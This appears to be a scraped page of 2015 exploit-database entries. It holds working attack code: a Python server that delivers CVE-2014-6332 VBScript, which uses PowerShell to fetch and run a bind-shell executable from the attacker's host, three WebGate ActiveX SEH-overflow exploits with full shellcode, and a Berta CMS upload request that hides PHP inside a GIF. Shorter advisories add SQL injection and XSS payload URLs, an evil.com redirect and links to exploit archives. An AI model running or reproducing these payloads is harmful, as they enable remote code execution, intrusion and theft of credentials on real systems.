HireHackking

#!/usr/bin/python import BaseHTTPServer, sys, socket ## # Acunetix OLE Automation Array Remote Code Execution # # Author: Naser Farhadi # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 # # Date: 27 Mar 2015 # Version: <=9.5 # Tested on: Windows 7 # Description: Acunetix Login Sequence Recorder (lsr.exe) Uses CoCreateInstance API From Ole32.dll To Record # Target Login Sequence # Exploit Based on MS14-064 CVE2014-6332 http://www.exploit-db.com/exploits/35229/ # This Python Script Will Start A Sample HTTP Server On Your Machine And Serves Exploit Code And # Metasploit windows/shell_bind_tcp Executable Payload # And Finally You Can Connect To Victim Machine Using Netcat # Usage: # chmod +x acunetix.py # ./acunetix.py # Attacker Try To Record Login Sequence Of Your Http Server Via Acunetix # nc 192.168.1.7 333 # Payload Generated By This Command: msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe # # Video: https://vid.me/SRCb ## class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(req): req.send_response(200) if req.path == "/acunetix.exe": req.send_header('Content-type', 'application/exe') req.end_headers() exe = open("acunetix.exe", 'rb') req.wfile.write(exe.read()) exe.close() else: req.send_header('Content-type', 'text/html') req.end_headers() req.wfile.write("""Please scan me! <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/acunetix.exe',\ 'acunetix.exe');$(New-Object -com Shell.Application).ShellExecute('acunetix.exe');" shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0 end function dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script>""") if __name__ == '__main__': sclass = BaseHTTPServer.HTTPServer server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler) print "Http server started", socket.gethostbyname(socket.gethostname()), 80 try: server.serve_forever() except KeyboardInterrupt: pass server.server_close()

<html> <!-- Author: Praveen Darshanam http://blog.disects.com http://darshanams.blogspot.com # Exploit Title: WebGate eDVR Manager SiteName Stack Overflow SEH Overwrite (0Day) # Date: 27th March, 2015 # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174 # Version: eDVR Manager 2.6.4 # Tested on: Windows XP SP3 using IE/6/7/8 # CVE : 2015-2098 WebGate eDVR Manager WESPPlayback.WESPPlaybackCtrl.1 SiteName Property Stack Buffer Overflow Remote Code Execution Vulnerability targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll" prototype = "Property Let SiteName ( ByVal SiteSerialNumber As String ) As String" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" --> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='sname'> </object> <script> var buff1= ""; var buff2= "PraveenD"; var nops = ""; for (i=0; i<128; i++) { buff1 += "B"; } var nseh = "\xeb\x08PD"; var seh = "\xa0\xf2\x07\x10"; for (i=0;i<80; i++) { nops += "\x90"; } //calc.exe payload sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(8000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++) { buff2 += "A"; } fbuff = buff1 + nseh + seh + nops + sc + buff2; sname.SiteName(fbuff) = buff2; </script> </html>

<html> <!-- Author: Praveen Darshanam http://blog.disects.com/ http://darshanams.blogspot.com # Exploit Title: WebGate Control Center GetThumbnail Stack Overflow SEH Overwrite (0Day) # Date: 27th March, 2015 # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=35 # Version: Control Center 4.8.7 # Tested on: Windows XP SP3 using IE/6/7/8 # CVE : 2015-2099 targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll" prototype = "Sub GetThumbnail ( ByVal SiteSerialNumber As String , ByVal Channel As Integer , ByVal secTime As Long , ByVal miliTime As Integer )" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" --> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='getthumb'> </object> <script> var buff1 = ""; var arg2=1; var arg3=1; var arg4=1; var nops = ""; var buff2 = ""; for (i=0;i<24; i++) { buff1 += "B"; } // jump over seh to shellcode nseh = "\xeb\x08PD"; // pop pop ret var seh = "\xa0\xf2\x07\x10"; for (i=0;i<80; i++) { nops += "\x90"; } //calc.exe payload sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000-(buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++) { buff2 += "A"; } fbuff = buff1 + nseh + seh + nops + sc + buff2; getthumb.GetThumbnail(fbuff ,arg2 ,arg3 ,arg4); </script> </html>

<html> <title>WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day)</title> <!-- # Exploit Title: WebGate WinRDS StopSiteAllChannel Stack Overflow SEH Overwrite (0Day) # Google Dork: [if relevant] (we will automatically add these to the GHDB) # Date: 27th March, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36 # Version: WinRDS 2.0.8 # Tested on: Windows XP SP3 using IE/6/7/8 # CVE : 2015-2094 targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll" prototype = "Sub StopSiteAllChannel ( ByVal SiteSerialNumber As String )" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" Vulnerable Product = WinRDS 2.0.8 Software = http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36 --> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='ssac'> </object> <script> var buff1 = ""; var nops = ""; var buff2 = ""; for (i=0;i<128; i++) { buff1 += "B"; } nseh = "\xeb\x08PD"; //pop pop ret = 1007f2a0 (0x1007f29e) 1007f2a0 var seh = "\xa0\xf2\x07\x10"; for (i=0;i<80; i++) { nops += "\x90"; } sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + "\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" + "\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" + "\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" + "\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" + "\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" + "\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" + "\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" + "\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" + "\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" + "\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" + "\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" + "\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" + "\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" + "\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" + "\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" + "\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" + "\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" + "\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" + "\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" + "\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" + "\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" + "\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" + "\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41"; for (i=0;i<(5000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++) { buff2 += "A"; } fbuff = buff1 + nseh + seh + nops + sc + buff2; ssac.StopSiteAllChannel(fbuff); </script> </html>

Berta CMS is a web based content management system using PHP and local file storage. http://www.berta.me/ Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought to our attention we checked the file upload functionality of this software. We found that the file upload didn't require authentication. Images with a ".php" extension could be uploaded, and all that was required is that they pass the PHP getimagesize() function and have suitable dimensions. It is possible for GIF image files (and possibly other image files - not tested) to contain arbitrary PHP whilst being well enough formed to pass the getimagesize() function with acceptable dimensions. http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ <http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/> We can't ascertain if this is the weakness that was used to compromise the 3rd party server in question, however the patch requires authentication for all file uploads, which will likely resolve any similar issues. The author was notified: 2015-03-22 Author Acknowledge: 2015-03-23 Patch released: 2015-03-26 The berta-0.8.10b.zip file from: http://www.berta.me/download/ includes a fix that requires authentication to upload files. This announcement should not be interpreted as implying either the author, or Surevine, have conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes you just want to make life harder for those sending phishing emails). The following POST request will upload a c.php file which will run phpinfo() when fetched on vulnerable servers. POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1 Host: 192.168.56.101 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.56.101/upload.html Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------2147563051636691175750543802 Content-Length: 1617 -----------------------------2147563051636691175750543802 Content-Disposition: form-data; name="Filedata"; filename="c.php" Content-Type: text/php GIF89/* < ³ ÿÿÿfffÌÌÌ333Ìÿÿ™™™3ffÌÌÿÌÿÌ™™Ìf3f 33 f™™3 3 3!þ GIF SmartSaver Ver1.1a , È < þ ÈI«½8ëÍ»ÿ`(Ždižhª®lë¾p,Ïtmßx®ï|ïÿÀ p¸ Ȥr™$ö˜ 4ê¬Z¯Õ cËíz¿`n { „ 2-xLn»ßé³|Î`« ¼^O6‡ãkp‚ƒ„#jtˆ]v)~`}g€_‹…”••‡‰‰“' _ 1˜Š–¤¥‚¢™s›& ^ŸŽ¡a«¦´µ?¨©g³$­]¯ž± ¶ÃÄ<¸¹Âw X½\‘^»ÅÒÓ+ÇÈÐ,Í[Ô%ÇÑÜàá)ÖßÙËâ Þèëì'äeç MÌJ êíøùöº x{{ üý P€‚64 ðVpÃ@> 8PƒÄ3 R±pOŸÇ þ ÞU8˜!@˜ (SbL9 a “š6Z8·° É 03 )¡#ÈŸøD Œ÷òäµI ¬ qY RN›D $½Æ€§O XÅ p §Qd‹ P­s c˜® &’y5«Ûi[ÓF ð´‹R~ ÄŽ%Û4 Z {· Ðö­a[q¥Î•P—Ë]Yy o™„mc/*ål,|¸3©Ä )\fðX˜d.L+Ç“Ã Àh¾ 8{žM ôb×'‡‚**GãEŒ Tï>غgnãÉh+/d{·…у¹FU;ñ9ë ‰Xv} A/¬Ø —‹ Ôü»u0Ñå:g Ãëôªxv-À’嬮²Çë'R ˜Wôº™þ' f XCÅuýÜÆ ~áíç ý¹âÞqê xÐ7Þ}ÑP{ ®ç Ö„Ôàƒ$ ¡/ (Ýz zQÜLááÕ¡€ ý6‡ˆÉ•¨c ':“â é)¶ w Ý <­H£A5å‚£$;FÉ£ŒJúw Z žŠ -ƒ$ ¡Iõ "Ob#å™8ô¸Í ˜e)a™vu@ä— „6f"pŠ æž5¨‰Ð XVù&r v 3jy'ž„šÉç£/øY …B h¤œ^ž f<‹’FP‹(n %¤¤² )›q *{\j0§¦už *f;©ê£¨Ž–ª« § Ú¦­kÒ¥`ž‚ k¢oZÓ ²¡þæ·ë³ ôzå¯ j9ë /º9*/<?php phpinfo(); ?>/* `ÇŽ´Ìµ°U .±áBkî>#VëE’ ¦ªîª• Šj v«­ £í ¹åœë/®¹¾‹ Æ;h»6 D ·`°k0ŠÇ H¡³ÿú› ÃòN n Äñf/¹¤a÷±ÀkFÜ ‡ WlîÅÊÊ4f c¶Q s´6 ¢ˆz Ê1/RǯÊ@Wpñ ™É ³&¸ ­Ç]Aæ|ñ n± O ôÕ o+îi! † ¥!"“ÓÀ"4õ ¥—2Ö¤^ óX0wʆZ™´F6É rÝuÖV³­²Û Ò óÔzâ Hqw?|kà‚ÿìwÅnóýUÆ’k­øá‡e |ùŸ•£7šã [L%G‚ãA©á}‹–Ku™7¼éza q- k‡Žf䬆·¯¯£ŽÔé² $nç Àk vº¶'o D(åá°< éQ€ `£` q}FÙ*ïý÷à‡/þøä—oþù觯þúì·ïþûðÇ/ÿüô×oÿýøç¯ÿþü÷ïÿÿ ; -----------------------------2147563051636691175750543802 Content-Disposition: form-data; name="submit" Upload Image -----------------------------2147563051636691175750543802-- Simon Waters

source: https://www.securityfocus.com/bid/51317/info Atar2b CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Atar2b CMS 4.0.1 is vulnerable; other versions may also be affected. http://www.example.com/gallery_e.php?id=118+order+by+10--

source: https://www.securityfocus.com/bid/51337/info SonicWall AntiSpam & EMail is prone to a cross-site scripting vulnerability, a URI-redirection vulnerability, and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or conduct phishing attacks. Other attacks are also possible. AntiSpam & EMail 7.3.1 is vulnerable; other versions may also be affected. http://www.example.com/reports_mta_queue_status.html?hostname=greenland%22%3E%3C* http://www.example.com/msg_viewer_user_mail.html?messageStoreId=shard_20100321/256665421/JUI&direction=

source: https://www.securityfocus.com/bid/51338/info Gregarius is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Gregarius versions 0.6.1 and prior are vulnerable. http://www.example.com/?page=1[it'shere]&media=rss& http://www.example.com/admin/index.php?domain=folders&action=edit&fid=8[it'shere xss with sql] http://www.example.com/admin/index.php?domain=folders&action=edit&fid=8%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

source: https://www.securityfocus.com/bid/51339/info Advanced File Management is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Advanced File Management 1.4 is vulnerable; other versions may also be affected. http://www.example.com/users.php?page=[xss]

source: https://www.securityfocus.com/bid/51357/info WordPress Age Verification plugin is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. WordPress Age Verification plugin 0.4 and prior versions are vulnerable. http://www.example.com/wp-content/plugins/age-verification/age-verification.php?redirect_to=http%3A%2F%2Fwww.evil.com

source: https://www.securityfocus.com/bid/51365/info PHP-Fusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. PHP-Fusion 7.02.04 is vulnerable; other versions may also be affected. http://www.example.com/[Path]/downloads.php?cat_id=[Xss]

source: https://www.securityfocus.com/bid/51373/info KnowledgeTree is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. KnowledgeTree 3.7.0.2 is vulnerable; prior versions may also be affected. http://www.example.com/login.php/%22onmouseover=alert%28document.cookie%29;%3E http://www.example.com/admin.php/%22onmouseover=alert%28document.cookie%29;%3E http://www.example.com/admin.php/%22onmouseover=alert%28document.cookie%29;%3E http://www.example.com/preferences.php/%22onmouseover=alert%28document.cookie%29;%3E

source: https://www.securityfocus.com/bid/51377/info Kayako SupportSuite is prone to the following vulnerabilities: 1. Multiple HTML-injection vulnerabilities. 2. A remote code-execution vulnerability. 3. Multiple cross-site scripting vulnerabilities. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible. Kayako SupportSuite 3.70.02-stable and prior versions are vulnerable. Remote code-execution: http://www.example.com/support/admin/index.php?_m=core&_a=edittemplate&templateid=11&templateupdate=register Cross-site scripting: http://www.example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9 http://www.example.com/support/staff/index.php?_m=news&_a=managenews http://www.example.com/support/staff/index.php?_m=troubleshooter&_a=managecategories http://www.example.com/support/staff/index.php?_m=downloads&_a=managefiles http://www.example.com/support/staff/index.php?_m=teamwork&_a=editcontact&contactid=[added contact ID] http://www.example.com/support/staff/index.php?_m=livesupport&_a=adtracking http://www.example.com/support/staff/index.php?_m=livesupport&_a=managecannedresponses http://www.example.com/support/staff/index.php?_m=tickets&_a=managealerts http://www.example.com/support/staff/index.php?_m=tickets&_a=managefilters

source: https://www.securityfocus.com/bid/51367/info ExpressView Browser Plug-in is prone to multiple integer overflow and remote code-execution vulnerabilities. Successful attacks will allow attackers to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition. ExpressView Browser Plug-in 6.5.0.3330 and prior versions are vulnerable. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36542.zip

source: https://www.securityfocus.com/bid/51393/info GreenBrowser is prone to a remote use-after-free memory-corruption vulnerability. Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of the application. Failed exploit attempts will result in denial-of-service conditions. GreenBrowser 6.0.1002 and prior versions are vulnerable. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36546.rar

source: https://www.securityfocus.com/bid/51389/info The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users. NOTE: This issue affects Linux kernels running as guest images. [bits 32] global _start SECTION .text _start: syscall

